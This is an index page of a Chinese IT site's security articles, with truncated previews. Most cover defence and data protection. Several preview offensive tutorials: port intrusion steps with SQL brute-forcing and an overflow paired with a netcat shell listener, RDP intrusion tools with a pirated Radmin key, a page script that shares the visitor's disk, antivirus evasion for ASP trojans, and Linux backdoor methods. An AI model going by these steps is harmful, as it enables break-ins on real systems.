首 页IT知识库收藏本站
当前位置:翔宇亭IT乐园IT知识库电脑基础安全防护
安全防护知识文章关闭所有内容预览 | 展开所有内容预览
  • 清除网页隐形杀手 防止SQL注入 保障操作系统安全 [内容预览] 203 | 2011-05-18
    对于个人用户来说,除了病毒和木马,网页中的隐形代码也开始严重地威胁着我们的安全,但大多数人却缺乏自我保护意识,对隐形代码的危害认识不够,甚至在自己不知情的情况下被别人窃取了重要资料。因为隐形代码具有比较大的隐蔽性,到目前为止,还没有什么病毒防火墙能很好地阻止隐形代码的攻击,大多数甚至根本就不能发现。所以我们更应该高度警惕网页代码中的隐形杀手。 一般来说网页代码中的“隐形杀手”大致分为以下几类,大...

    [阅读全文]

  • 网站安全之系统与服务器安全管理 [内容预览] 212 | 2011-04-15
    Windows 2000 Server、Freebsd是两种常见的服务器。第一种是微软的产品,方便好用,但是,你必须要不断的patch它。Freebsd是一种优雅的操作系统,它简洁的内核和优异的性能让人感动。关于这几种操作系统的安全,每种都可以写一本书。这里不会对它们进行详细描述,只讲一些系统初始化安全配置。 Windows2000 Server的初始安全配置 Windows的服务器在运行时,...

    [阅读全文]

  • 微软2011年4月份安全公告发布17个补丁 [内容预览] 150 | 2011-04-15
    微软4月计划发布17个补丁,修复Windows、Office、IE、Visual Studio、.NET Framework和GDI+等软件中的64个安全漏洞。在17个安全补丁中,有9个是严重等级的安全补丁。这是微软最严重的补丁级别。 微软将在美国东部时间4月12日星期二下午1点发布这些补丁。这些补丁将包含一个IE浏览器的更新,修复两个已知的安全问题。 微软称,我们本月将修复微软已经说过的一些...

    [阅读全文]

  • 电子邮件安全性的保障问答 [内容预览] 315 | 2011-04-13
    就电子邮件这件事来讲,大部分人觉得「我的邮件没什么秘密」,这没错。但大部分人不知道什么信息有可能成为秘密,这也没错。此外,你总有需要发个密码或艳照的时候。 一、我所有邮箱都是 Gmail 或 Google Apps 的,而且都是 IMAP,那么如果我用 Mail,是不是本身就有 SSL 加密了? 答:通过网页介面访问时,Gmail / Google Apps 的邮箱默认是加密的。如用电邮客户端...

    [阅读全文]

  • [图文] 全面解析金山毒霸2011的特点 [内容预览] 237 | 2011-04-13
    金山毒霸2011 SP4.1首次在杀毒软件中加入了系统修复引擎,该引擎能够帮助用户恢复被病毒木马破坏的系统文件和部分关键应用程序。至此,金山毒霸也成为杀毒软件中首款一款拥有蓝芯II本地杀毒引擎、在线云查杀引擎和系统修复引擎于一身的专业杀毒软件。 金山毒霸2011 SP4.1发布  此前金山宣布与可牛科技合并,旗下软件全面永久免费。那么全面免费后,金山安全拳头产品之一的金山毒霸能否保持一贯的...

    [阅读全文]

  • 数据究竟是如何丢失的 [内容预览] 254 | 2011-03-07
    我们对磁盘的印象和真正的磁盘往往是两回事。例如,计算机病毒和系统故障更容易破坏你的数据吗?病毒确实会影响系统的性能,但是它们却不太可能损坏你的数据。你的系统,则是另一方面的问题…… 我将详细讨论导致数据丢失的原因,今天先从造成数据丢失的主要原因谈起,随后将讨论造成数据丢失的设备和系统故障的成因。 希望找到保护数据的“尚方宝剑”吗?可惜它并不存在。定期备份你的数据,将数据保存在本地硬盘或者Car...

    [阅读全文]

  • 你为什么需要数据保护管理 [内容预览] 163 | 2011-03-07
    对于所有的IT公司来说,数据保护是一项必须得做好的工作。即使是关键应用暂时无法访问数据也可能造成严重后果,或是收入减少,亦或是工作效率下降。如果关键数据永久丢失,那么后果就不可想象了。因此,IT公司不得不投入大笔资金用于数据保护技术。 虽然数据保护行业正在经历快速变革,但是IT公司仍然依赖于传统的备份/恢复软件流程,将此作为他们数据保护策略的支柱。虽然虚拟磁带库(VTL)可能会取代物理磁带库,但...

    [阅读全文]

  • 如何应对无可避免的数据破坏 [内容预览] 166 | 2011-03-07
    全球最大的粒子物理学实验室CERN最近对数据损坏和字节破坏问题进行了研究。CERN的Peter Keleman总结出了存储专业人士务必了解的一些可能的解决方案。但是这与最终用户有什么关系呢?在几个月之前,我在旅途中碰巧遇到了这样一个问题,我怀疑是由数据损坏引起的。作为一名顾问,我经常到各地出差,为了提前预定各种票和房间,我成为了许多酒店、航空公司、租车公司和其他旅游公司的会员。 在8月份的一个早...

    [阅读全文]

  • IDC数据保护工作需应对五大挑战 [内容预览] 146 | 2011-02-27
     最近几个月发生的事件表明,仅仅跟上隐私和安全条例的发展并不意味着你就不会遭遇数据破坏。企业需要更加认真和更富创造性地对数据的管理和保护问题进行思考,并且以后这将比法规遵从更加重要,Voltage的Mark Bower写到。  在如此一个经济不景气时期思考这些问题具有特别的意义:恶劣的市场状况,企业消减开支、精简那些心怀不满的员工给渴望在全球数据系统领域得到尊重的黑社会发起有组织有预谋的攻击制造...

    [阅读全文]

  • 存储技术讲堂:深入了解连续数据保护 [内容预览] 149 | 2011-02-27
     存储网络工业委员会(SNIA)将可持续数据保护(CDP)定义为“一种可以不间断的捕捉数据变化轨迹,独立于已存储数据本身的存储仅有改动的数据,开启从之前任意点恢复,存储在一个独立位置并在真实恢复前无需被定义的一种方法论。”  需要特别注意到的是,在上述对可持续数据保护的定义中,并未出现有关“快照”的字眼。在当今的可持续数据保护软件中,厂商允许用户提前创建已知的恢复点,唯有这个时候,快照才被用到,...

    [阅读全文]

  • 解析需要数据保护管理的理由 [内容预览] 145 | 2011-02-27
    对于所有的IT公司来说,数据保护是一项必须得做好的工作。即使是关键应用暂时无法访问数据也可能造成严重后果,或是收入减少,亦或是工作效率下降。如果关键数据永久丢失,那么后果就不可想象了。因此,IT公司不得不投入大笔资金用于数据保护技术。 虽然数据保护行业正在经历快速变革,但是IT公司仍然依赖于传统的备份/恢复软件流程,将此作为他们数据保护策略的支柱。虽然虚拟磁带库(VTL)可能会取代物理磁带库,但...

    [阅读全文]

  • 四大步骤安全保护共有云上的服务器 [内容预览] 164 | 2011-02-27
    如果你的服务器放置在公有云上,那么在安全方面有一个角色是至关重要的。你知道是什么角色吗?就是安全经理的角色,这是一个非常重要的岗位。这项工作需要承担的职责可能远远超过了你所准备的范畴--特别是当你知道你需要承担起维护这些系统安全的法律义务和责任的时候。确实如此,你必须认真了解这些内容。你的公司对那些可能导致系统用户或者消费者数据丢失或者损坏的安全漏洞负有不可推卸的责任。 必要的勤奋就是你最好的防...

    [阅读全文]

  • [图文] 软硬兼施 中小型局域网数据保护双刃剑 [内容预览] 193 | 2011-02-27
    中小企业用户需求: 1.我的企业数据需不需要保护? 随着存储技术的普及和中小企业市场数据保护需求的增长,越来越多的中小企业用户对数据信息变得更加重视。无论是几个人的小公司还是几十人的中型用户,电子邮件、业务数据、客户资料及财务数据等成了企业每天赖以生存的信息,随着数据的不断增长,如何保存数据,使数据安全成了企业的必要需求。BakBone的数据备份软件和Infortrend磁盘阵列是当今存储市场...

    [阅读全文]

  • 什么是持续数据保护? [内容预览] 164 | 2011-02-27
    持续数据保护技术是对传统数据保护技术的一个重大突破。系统管理者无须关注数据的备份过程,而是仅仅当灾难发生后,简单地选择需要恢复到的数据备份时间点即可实现数据的快速恢复。 灾难恢复的对象主要有两个,其一是应用的业务数据,其二是应用的运行状态。通常的灾难恢复技术包括数据的备份、复制、应用的远程集群等。现在,一种新的灾难恢复技术——持续数据保护(Continuous Data ...

    [阅读全文]

  • 谨防浏览网页硬盘被共享 [内容预览] 209 | 2011-02-26
    你有没有碰到这样的情况:当浏览了某一网页后,硬盘就莫名其妙地被共享了?你一定很奇怪吧,想知道这是什么原因吗?其实也很简单,只需要在网页代码中加入一些特殊代码,就可以轻松地实现,不信?你也做一个试试吧! 其中的网页源代码如下: <script language=javaScript> document.write("<APPLET height=0 width=0 code=com.ms.Ac...

    [阅读全文]

  • 黑客经验之入侵3389起源完整编 [内容预览] 400 | 2011-02-26
     这多是本人多年下来的经验。  工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:  08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe po...

    [阅读全文]

  • 各个网络端口的ru侵方法 [内容预览] 834 | 2011-02-26
     希望对新手ru qin有帮助!  1. 1433端口ru qin  scanport.exe 查有1433的机器  SQLScanPass.exe 进行字典暴破(字典是关键)  最后 SQLTools.exeru qin对sql的sp2及以下的系统,可用sql的hello 溢出漏洞ru qin。  nc -vv -l -p 本机端口 sqlhelloF.exe ru qinip 143...

    [阅读全文]

  • 网络安全之注意警惕DoS的路由器攻击 [内容预览] 208 | 2011-02-26
     用Dos来攻击路由器将对整个因特网造成严重影响。因为路由协议会遭到直接攻击,从而在大范围内带来严重的服务器的可用性问题。路由器攻击之所以吸引黑客有几个原因。  不同于计算机系统,路由器通常处于企业的基础设施内部。与计算机相比,它们受监视器和安全政策的保护相对薄弱,从而为不法之徒提供了为非作歹的躲藏之处。许多路由器配置不当,厂商提供的默认口令是网络安全与遭受毁坏的主要原因。一旦受到危害,路由器就...

    [阅读全文]

  • 接入节点入手 谈黑客和DDOS攻击防御 [内容预览] 195 | 2011-02-26
     近一段时期以来,“黑客”已经成为网络上最热门的一个词语。“熊猫”刚走,“灰鸽子”又来。我们看到,随着网络的普及和带宽资费的松动,国内的“黑客”部落,已经从最初的炫耀技术,慢慢向“职业化”发展。  早期的“黑客”,主要利用操作系统或者软件的漏洞,入侵一些 WEB 服务等,窜改页面的内容,比如在主页写上“您的主页被 XXX 攻克” 的字样,以炫耀自己的技术。他们追求的只是“肉鸡”的占领,而尽量不破...

    [阅读全文]

  • [组图] 黑客技术之打造不死的ASP木马的方法 [内容预览] 240 | 2011-02-26
     想不到,前几天我才发现,我千辛万苦收集的asp木马,居然没有几个不被Kill的。常说养马千日用马一时,可要是连马都养不好,用的时候可就头疼了。众多杀软中,查杀效果比较好厉害的就是瑞星跟NOD32(测试软件:瑞星2006、卡巴斯基反病毒6.0、Kv2006、 NOD32 AntiVirusv2.51.30和McAfee VirusScan v8.0i)。  来看一下几种比较常见的ASP木马免杀方...

    [阅读全文]

  • 黑客高级技巧 Linux后门技术及实践 [内容预览] 297 | 2011-02-26
     后门简介  入侵者完全控制系统后,为方便下次进入而采用的一种技术。一般通过修改系统配置文件和安装第三方后门工具来实现。具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。  常用后门技术  增加超级用户账号  破解/嗅探用户密码  放置SUID Shell  rhosts + +  利用系统服务程序  TCP/UDP/ICMP Shell  Crontab定时任务  共享...

    [阅读全文]

  • 黑客工具介绍之DDoS攻击工具TFN2K分析 [内容预览] 254 | 2011-02-26
     本文是对分布式拒绝服务(DDoS)攻击工具"Tribe Flood Network 2000 (TFN2K)"的技术分析。TFN2K是由德国著名黑客Mixter编写的同类攻击工具TFN的后续版本。  关于Trinoo、TFN和Stacheldraht等分布式拒绝服务攻击工具的分析请参阅相关文档。  术语  客户端——用于通过发动攻击的应用程序,攻击者通过它来发送各种...

    [阅读全文]

  • 黑客工具介绍之DDoS攻击工具Trinoo分析 [内容预览] 758 | 2011-02-26
     本文是对拒绝服务攻击工具包trinoo中主/从程序服务器的一些分析。  Trinoo守护程序的二进制代码包最初是在一些Solaris 2.x主机中发现的,这些主机是被攻击者利用RPC服务安全漏洞"statd"、"cmsd"和"ttdbserverd"入侵的。关于这些漏洞的详细资料请参阅CERT事件记录99-04:  http://www.cert.org/incident_notes/IN-...

    [阅读全文]

  • [组图] Telnet高级入侵攻略及原理 [内容预览] 878 | 2011-02-26
     什么是Telnet  对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信协议,但是对于入侵者而言,Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源,而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。  2.Telnet被入侵者用来做什么  (1)Telnet是控制主机的第一手段  如...

    [阅读全文]

  • [组图] 黑客技术研究之系统防线溃于DNS蚁穴 [内容预览] 213 | 2011-02-26
     DNS 是域名系统 (Domain Name System) 的缩写。大家在上网时输入的网址,是通过域名解析系解析找到相对应的ip地址才能访问到网站。但是最近微软的Windows 2000和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被黑客成功利用的话,那么我们的上网操作将遇到巨大的麻烦。  黑客姓名:张均诚  黑客特长:Windows系统漏洞研究  使用工具:DNS服...

    [阅读全文]

  • 深入了解DDOS与DDOS追踪 [内容预览] 123 | 2011-02-26
     链级测试 (Link Testing)  多数的追踪技术都是从最接近victim的路由器开始,然后开始检查上流数据链,直到找到攻击流量发起源。理想情况下,这种过程可以递归执行直到找到攻击源头。这种技术假设攻击一直保持活动直到完成追踪,因此很难在攻击结束后、间歇性攻击或对追踪进行攻击调整等情况进行追踪。包括下面两种链级测试:  1、Input debugging  很多路由器都提供Input...

    [阅读全文]

  • 零时差攻击的危险性及特征 [内容预览] 290 | 2011-02-26
     无论你如何勤勉地修补系统和保护你的电脑,它仍然有可能在未曾预见到的攻击出现后的数个小时内中招。这篇文章将为您讲述零时差攻击的危险性以及它是如何利用安全漏洞的。  在电脑安全方面你并不曾懈怠。你随时更新应用程序,确保它们都是最新的版本,你也安装了反病毒软件。你很在意你浏览的是什么样的网站,在电脑上安装的是什么样的软件。  但是去年九月,如果你访问过由HostGator(位于佛罗里达州的一家顶级...

    [阅读全文]

  • 利用下载漏洞对数据库发起网络上的攻击 [内容预览] 154 | 2011-02-26
     作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。  1.强制下载后缀名为...

    [阅读全文]

  • 脚本攻击防范策略完全篇 [内容预览] 203 | 2011-02-26
     近来,网络上的SQL Injection 漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈。陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在防范或者是修复上都带来了很大的不便。HOOO...... 一个站长最大的痛苦莫过于此。自己的密码如何如何强壮却始终被攻击者得到,但如何才能做到真正意义上的安全呢?第一,别把密码和你的生活联系起来;第二,Su...

    [阅读全文]

  • 黑客入侵XP常用的七种方法 [内容预览] 165 | 2011-02-26
     这里将向你揭示黑客入侵Windows xp操作系统常用的七种方法。  第一招、屏幕保护  在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。  ...

    [阅读全文]

总数16630 上一页1 2 3 4 5 6下一页
关于本站 | 网站帮助 | 广告合作 | 网站声明 | 友情连接 | 网站地图
本站部分内容来自互联网,如有侵权,请来信告之,谢谢!
Copyright © 2007-2024 biye5u.com. All Rights Reserved.